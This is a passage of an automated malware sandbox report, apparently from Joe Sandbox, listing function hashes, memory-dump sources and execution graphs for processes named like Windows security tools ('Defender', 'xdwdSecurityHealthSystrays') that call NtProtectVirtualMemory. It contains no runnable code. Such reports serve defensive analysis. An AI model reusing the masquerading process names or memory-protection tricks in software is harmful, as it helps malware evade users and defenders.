                                                                                                                                                                                                                                                • Instruction ID: e62ed8ad883452a9542e2b55752d7d01f1f470d8fb8bc13c3ff0cbb07f461fd1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f94b1d877bfd4c4702eb4c996f623043802cb49f3604374120ddb7d1dc142c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E561E8B1D102298FEB54CFAAC844BEEFBF2BF48300F1485A9D458A7255D7745A86CF90
                                                                                                                                                                                                                                                Function 062398B8 Relevance: 1.0, Instructions: 991COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9a2a0b9766b4e98435e573e2760f8a169325bf459134e85647e5eebfeb907cb9
                                                                                                                                                                                                                                                • Instruction ID: 0bdd5078281282a37563b4d55cec6e574c078a094290d6ed84598a99fc37348c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a2a0b9766b4e98435e573e2760f8a169325bf459134e85647e5eebfeb907cb9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60A2D4B4E102298FDB64DF68C984BDDB7B2BF49300F5482A9D849A7355DB70AE85CF40
                                                                                                                                                                                                                                                Function 0623E4F0 Relevance: .9, Instructions: 868COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4c3ef8a987f7258a3f52431db54bc8536403a108939e7e06c0752946b3d11736
                                                                                                                                                                                                                                                • Instruction ID: 9adc2d21d5a77036c2351728480c7579cbd3cc4ff1afc4f4952bd5c6c3b4ef32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c3ef8a987f7258a3f52431db54bc8536403a108939e7e06c0752946b3d11736
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B925E74A106298FD754DF68C991B6EB7B2FF88300F55C1A9C509AB38AC734E981DF90
                                                                                                                                                                                                                                                Function 0623E4E1 Relevance: .5, Instructions: 502COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c811855f728092ef8ae7cfdf5dedc8cf8b86e1a7b4d76a4a0dcd1c149f8bc831
                                                                                                                                                                                                                                                • Instruction ID: 330591bb2537f45cb0ae1d57a73592fc0452438624051299ec09dcaa1ce1ad72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c811855f728092ef8ae7cfdf5dedc8cf8b86e1a7b4d76a4a0dcd1c149f8bc831
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A324D74A105298FD754DF68C991BAEB7B2FF88300F55C1AAC509AB386C734E981CF90
                                                                                                                                                                                                                                                Function 062393A0 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2e57a26e3d01ff2388846f566837c74f391ce7dd6de1a00d035fe5bcc1010133
                                                                                                                                                                                                                                                • Instruction ID: 1c9af6f682e9912c0f7f712c91e497b256ff35e4d71cc645c23e45414c337760
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e57a26e3d01ff2388846f566837c74f391ce7dd6de1a00d035fe5bcc1010133
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEE1C674E11228DFEB64CFA4C884B9DBBB2FF49310F2481A9D809A7355D774A985CF50
                                                                                                                                                                                                                                                Function 029CDD44 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7384fc5dd2e867af60f70f90e1e4b61cd3e87ba69ecab0eb7d967945906e656b
                                                                                                                                                                                                                                                • Instruction ID: b7557b1784d627821258673663ffb731cd6d47aed999bee99645a16261057889
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7384fc5dd2e867af60f70f90e1e4b61cd3e87ba69ecab0eb7d967945906e656b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0A17D32E002098FCF05DFA4C4445AEBBB7FF85300B25856EE905AB261DB75D946CF91

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:41.7%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 10774 7ffa1b3d23d7 10777 7ffa1b3d2351 10774->10777 10775 7ffa1b3d235a 10776 7ffa1b3d2604 NtProtectVirtualMemory 10778 7ffa1b3d2645 10776->10778 10777->10775 10777->10776 10766 7ffa1b3d223a 10769 7ffa1b3cd080 10766->10769 10768 7ffa1b3d2245 10771 7ffa1b3d2320 10769->10771 10770 7ffa1b3d235a 10770->10768 10771->10770 10772 7ffa1b3d2604 NtProtectVirtualMemory 10771->10772 10773 7ffa1b3d2645 10772->10773 10773->10768

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3CD080 Relevance: 1.9, APIs: 1, Instructions: 384COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.52857475635.00007FFA1B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffa1b3c0000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1ed8fabf0a30f63349babf10e1f14d356f155dff3d5bd932408f7b5c31616366
                                                                                                                                                                                                                                                • Instruction ID: e9fa14ddc62482101a07f4627902bf86d61266b21d32ff39b151a75c7e34da6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ed8fabf0a30f63349babf10e1f14d356f155dff3d5bd932408f7b5c31616366
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63B14632A1CE444FE35C971CEC066B8B7D2EB9A331F55817EE04DC32A2DD35AC528A81

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3C7198 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.52857475635.00007FFA1B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffa1b3c0000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 715ca470d4291ea69672055f40970c398ef7e5530296c943f96b4249833624e9
                                                                                                                                                                                                                                                • Instruction ID: f42d6c8d28e0d57af7f3e4e6aaee57263ce08d61a92e6e26b2be52afc0672723
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 715ca470d4291ea69672055f40970c398ef7e5530296c943f96b4249833624e9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A41A02BB2892616D3017F6DF8428F87710EFD227B788C1B3D28D89077A959704A45DA

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:13.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 10868 7ffa1b3e17cd 10869 7ffa1b3e1831 NtProtectVirtualMemory 10868->10869 10871 7ffa1b3e18b5 10869->10871

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3E17CD Relevance: 1.6, APIs: 1, Instructions: 128nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 632 7ffa1b3e17cd-7ffa1b3e18b3 NtProtectVirtualMemory 636 7ffa1b3e18b5 632->636 637 7ffa1b3e18bb-7ffa1b3e18e6 632->637 636->637
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.52864145112.00007FFA1B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffa1b3d0000_FixerNerest.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                • Opcode ID: 011c1dedc377db8578078bd8d67c3358d2dd0997097060b1418ee3a72c251bb6
                                                                                                                                                                                                                                                • Instruction ID: d4873b6957915b7e98ed4833b266b13fe3cb74c4958992a742af430628004e4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 011c1dedc377db8578078bd8d67c3358d2dd0997097060b1418ee3a72c251bb6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC31953191CB5C4FDB589B5CA805AED7BE1EB99321F0082AFE04DD3256DA74A8458BC2

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:11.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 12574 7ffa1b3b23d7 12578 7ffa1b3b2351 12574->12578 12575 7ffa1b3b235a 12576 7ffa1b3b2604 NtProtectVirtualMemory 12577 7ffa1b3b2645 12576->12577 12578->12575 12578->12576 12566 7ffa1b3b223a 12569 7ffa1b3ad080 12566->12569 12568 7ffa1b3b2245 12571 7ffa1b3b2320 12569->12571 12570 7ffa1b3b235a 12570->12568 12571->12570 12572 7ffa1b3b2604 NtProtectVirtualMemory 12571->12572 12573 7ffa1b3b2645 12572->12573 12573->12568

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3AD080 Relevance: 1.9, APIs: 1, Instructions: 385COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.52884034744.00007FFA1B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffa1b3a0000_xdwdSecurityHealthSystrays.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 692f9149dea7a35dd1dba482a818f98f1ae9bf916c6ac124fdc345110abff6b3
                                                                                                                                                                                                                                                • Instruction ID: 01423a8f14a0ad2af291cbeeb9eb982fba967c8962d2a278de0d46bf672b68f0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 692f9149dea7a35dd1dba482a818f98f1ae9bf916c6ac124fdc345110abff6b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4B15832A1CE448FE35C971CAC066B8BBD1EB96360F15827EE04DC36A6DD386C528681

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 9606 7ffa1b3b23d7 9609 7ffa1b3b2351 9606->9609 9607 7ffa1b3b235a 9608 7ffa1b3b2604 NtProtectVirtualMemory 9610 7ffa1b3b2645 9608->9610 9609->9607 9609->9608 9598 7ffa1b3b223a 9601 7ffa1b3ad080 9598->9601 9600 7ffa1b3b2245 9603 7ffa1b3b2320 9601->9603 9602 7ffa1b3b235a 9602->9600 9603->9602 9604 7ffa1b3b2604 NtProtectVirtualMemory 9603->9604 9605 7ffa1b3b2645 9604->9605 9605->9600

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3AD080 Relevance: 1.9, APIs: 1, Instructions: 385COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000013.00000002.52898691162.00007FFA1B3A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A4000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7ffa1b3a4000_xdwdSecurityHealthSystrays.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e88e241075e5ae15abf55b37c5c8a40324cd76d4d41076f8c9c39ee5909b3aac
                                                                                                                                                                                                                                                • Instruction ID: 63ad3a0aabc39440fe53380551c6e58f5bfb66e13efc0eb8cea4214bc754086c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e88e241075e5ae15abf55b37c5c8a40324cd76d4d41076f8c9c39ee5909b3aac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9B14832A1CF448FE35C971CAC066B9BBD1EB96361F15827EE04DC36E6DD286C528681

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 9544 7ffa1b3d17cd 9545 7ffa1b3d17df NtProtectVirtualMemory 9544->9545 9547 7ffa1b3d18b5 9545->9547

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3D17CD Relevance: 1.6, APIs: 1, Instructions: 128nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 237 7ffa1b3d17cd-7ffa1b3d18b3 NtProtectVirtualMemory 242 7ffa1b3d18b5 237->242 243 7ffa1b3d18bb-7ffa1b3d18e6 237->243 242->243
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000014.00000002.53605210794.00007FFA1B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ffa1b3c0000_Defender.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                • Opcode ID: 73f3a8c5211f2fbd981715551d46e5b1843b75b538f31ce1861281af922a3218
                                                                                                                                                                                                                                                • Instruction ID: 17011e177ac323651c0ae75a50d8c352c5160511f15d5dd7b9d09a1c87cec31f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73f3a8c5211f2fbd981715551d46e5b1843b75b538f31ce1861281af922a3218
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D531953191CB5C4FDB58DB5CA8056ED7BE1EB99321F0082AFE04DD3256DE74A8458BC2

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 10519 7ffa1b3b23d7 10521 7ffa1b3b2351 10519->10521 10520 7ffa1b3b235a 10521->10520 10522 7ffa1b3b2604 NtProtectVirtualMemory 10521->10522 10523 7ffa1b3b2645 10522->10523 10511 7ffa1b3b223a 10514 7ffa1b3ad080 10511->10514 10513 7ffa1b3b2245 10516 7ffa1b3b2320 10514->10516 10515 7ffa1b3b235a 10515->10513 10516->10515 10517 7ffa1b3b2604 NtProtectVirtualMemory 10516->10517 10518 7ffa1b3b2645 10517->10518 10518->10513

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3AD080 Relevance: 1.9, APIs: 1, Instructions: 385COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000015.00000002.52911652813.00007FFA1B3A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A4000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffa1b3a4000_xdwdSecurityHealthSystrays.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 038c31521051b3ad68b69439bbc8b22286dcb8190dfde4aa64fb4c5ddd4452b0
                                                                                                                                                                                                                                                • Instruction ID: 7076e30ef4647c1c402a5265d14c2a95b08f3d2e95c8481f29097d16555898ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 038c31521051b3ad68b69439bbc8b22286dcb8190dfde4aa64fb4c5ddd4452b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FB14832A1CE448FE35C971CAC066B9BBD1EB96361F15827EE04DC36A6DD386C528681

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:13.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 8134 7ffa1b3a17cd 8135 7ffa1b3a17df NtProtectVirtualMemory 8134->8135 8137 7ffa1b3a18b5 8135->8137

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3A17CD Relevance: 1.6, APIs: 1, Instructions: 131nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 255 7ffa1b3a17cd-7ffa1b3a18b3 NtProtectVirtualMemory 260 7ffa1b3a18b5 255->260 261 7ffa1b3a18bb-7ffa1b3a18e6 255->261 260->261
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000016.00000002.52930450702.00007FFA1B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B390000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_7ffa1b390000_Defender.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                • Opcode ID: 9652dfc134b4ffab2c2136e93ce0e324004c8c7bd3e8481c75f4e7076a85c6fb
                                                                                                                                                                                                                                                • Instruction ID: 8ff538e4f9d4772330056ae305aed89ad668529e2318b076be293ac728223516
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9652dfc134b4ffab2c2136e93ce0e324004c8c7bd3e8481c75f4e7076a85c6fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF31957191CB5C4FDB58DB5C98066ED7BE1EB99321F0082AFE04DD3252DE74A8458BC2

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:10.3%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 16426 7ffa1b3e23d7 16430 7ffa1b3e2351 16426->16430 16427 7ffa1b3e235a 16428 7ffa1b3e2604 NtProtectVirtualMemory 16429 7ffa1b3e2645 16428->16429 16430->16427 16430->16428 16418 7ffa1b3e223a 16421 7ffa1b3dd080 16418->16421 16420 7ffa1b3e2245 16423 7ffa1b3e2320 16421->16423 16422 7ffa1b3e235a 16422->16420 16423->16422 16424 7ffa1b3e2604 NtProtectVirtualMemory 16423->16424 16425 7ffa1b3e2645 16424->16425 16425->16420

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3DD080 Relevance: 1.9, APIs: 1, Instructions: 386COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000017.00000002.53457988545.00007FFA1B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_7ffa1b3d0000_xdwdSecurityHealthSystrays.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3a6aea486c69622b0b0d37d6a59bb1e618b530cac15e28494953779e55951c72
                                                                                                                                                                                                                                                • Instruction ID: 625add238ead23c91df59ee1b75ada093954c77b327b2aaf573fb4b038d0df2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a6aea486c69622b0b0d37d6a59bb1e618b530cac15e28494953779e55951c72
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAB14632A1CE444FE75C971CAC466B8B7D2EB9A320F15817FE04DC32E2DD34AC528A85

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:11.8%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 10261 7ffa1b3b17cd 10262 7ffa1b3b17df NtProtectVirtualMemory 10261->10262 10264 7ffa1b3b18b5 10262->10264

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFA1B3B17CD Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 472 7ffa1b3b17cd-7ffa1b3b18b3 NtProtectVirtualMemory 477 7ffa1b3b18b5 472->477 478 7ffa1b3b18bb-7ffa1b3b18e6 472->478 477->478
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000018.00000002.53453095931.00007FFA1B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_7ffa1b3a0000_Defender.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                • Opcode ID: 2ef06cb163c0c8eabd3de0df522a866b03a4c463fdc32d53a27f35d2838a1a07
                                                                                                                                                                                                                                                • Instruction ID: 4c7b29c0791c9eaaefbc5d6e67978ed189b55303e01e89b6e71aa28ee42cd933
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ef06cb163c0c8eabd3de0df522a866b03a4c463fdc32d53a27f35d2838a1a07
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E431A73191CB5C8FDB58DB5CA8056ED7BE1EB99321F0082AFE04DD3256DE74A8458BC2